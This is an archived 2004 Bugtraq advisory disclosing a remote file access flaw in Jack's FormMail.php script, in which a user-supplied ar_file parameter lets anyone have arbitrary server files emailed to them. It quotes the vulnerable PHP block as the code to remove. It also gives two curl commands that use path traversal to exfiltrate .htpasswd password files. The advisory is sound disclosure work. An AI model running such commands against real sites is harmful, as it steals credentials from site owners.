lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 31 Dec 2004 15:06:38 -0800
From: Hack Hawk <hh@...khawk.net>
To: bugtraq@...urityfocus.com
Subject: Jacks FormMail.php remote file access vulnerability


Security Advisory

Vendor:       Jack (Jack's Scripts)
Date:         31-Dec-2004
Script:       FormMail.php
Site:         http://dtheatre.com/scripts/formmail.php
Type:         Remote
Severity:     High
Version:      5.0 (maybe others)

Script Overview:

Jacks FormMail.php script is a simple PHP script that
allows web site owners to easily email form values to
themselves without much work or scripting knowledge.

Problem:

The script currently accepts an auto-reply variable
(ar_file) that specifies a filepath to send to the
person submitting the form.  The problem is that
this variable can be defined by the person submitting
the form and can be used to have arbitrary server
files sent to that person.

I found this vulnerability because someone used the
attack against a customer of mine.  Because this is
being used in the wild, I'm posting immediately to
BUGTRAQ without waiting for Jack to fix the script.

Solution:

Remove the following code from the FormMail.php
script.
------------------------------------------------------
if (file_exists($ar_file)) {
   $fd = fopen($ar_file, "rb");
   $ar_message = fread($fd, filesize($ar_file));
   fclose($fd);
   mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}
------------------------------------------------------

Example Attack:

Assume the following
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd

Use the following curl command to have the password file emailed to you.

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you@...rsite.com http://yoursite.com/cgi-bin/formmail.php

Depending on permission settings, the .htpasswd could be
compromised, even if it is outside of the html folder as
in the following example.

# curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d
email=you@...rsite.com http://yoursite.com/cgi-bin/formmail.php

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ